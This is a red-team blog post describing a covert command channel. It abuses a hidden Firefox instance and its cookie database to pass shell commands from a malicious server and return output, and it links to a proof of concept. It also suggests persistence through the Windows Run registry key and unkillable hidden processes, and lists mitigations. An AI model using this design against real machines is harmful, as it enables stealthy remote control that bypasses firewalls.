Saturday, December 23, 2017

Firefox tunnel

A crucial element of the Red Team's task is stealth in the attack. Success is its ability to espouse an aggressive mindset. If the red team wins, an absolute cracker's point of view can help construct a better defence for the Blue Team in the future. Don't bear this content. All content here has a practical purpose.

This blog post is about a different attack approach to remote control the machine and bypasses the firewall. We have many weapons to work in that perspective, something like veil framework, msfvenom. But sometimes, following a different path will generally bring good results.

 The attack aims to use firefox to communicate between client and server. Using hooks to do that is not impossible, but DLL injection sometimes is boring to implement and can be harder to turn in portable. Do you know that? x32 and x64, each architecture needs a different approach to develop(in the future, I discovered that the easy hook API could solve that). Another day I was studying the firefox internals, reading something about the use of SQLite to work with cookies that gave me a different focus.
Look at the following:





















That is a complete plan to create a program to use firefox with the tunnel. I going to explain in each step:

1- Programm of tunnel call firefox browser in hidden mode, sending a URL, URL has a malicious server, that malicious server sends a cookie with command.

2- The tunnel gets a cookie of evil server in the cookie.SQLite uses that in the command shell.

3- Result of command shell is used to write an HTML with javascript to make auto-submit with the content result.

4- Programm open wrote HTML in hidden mode to send CMD to the malicious server.


 Now you can look at the following:





















For a satisfactory conclusion, I wrote the code and recorded the proof of concept. The incredible fact of the empirical point turns all into reality. You can view all staff at the following:



https://github.com/convisoappsec/firefox_tunnel



Future insights:



Insert persistence, using function RegOpenKeyEx() to open path: 

"Software\Microsoft\Windows\CurrentVersion\Run" 

write with function RegSetValueEx() to launches a program automatically at system startup.


 *Using images in I/O using steganography.


 *Running process in hidden mode.


 *Turn to tunnel unkillable process.


Possible mitigations:



* Global hooking, to get OpenFile(), CreateFIle() functions and filter argv "cookie.sqlite" and block when programm route is different of firefox.exe.


* File watch API to monitor the database of cookies.


* Programm to open database of cookies by periodicity and search wrong domain or hosts, that can use a blocklist to find and uses DELETE query to remove the evil cookie.




Thank you for reading this. Cheers!

The magic of bits

 Before the long tale to the course of magic bits, let's gonna for a little walk in the world of C language. Variable of type int has 4 ...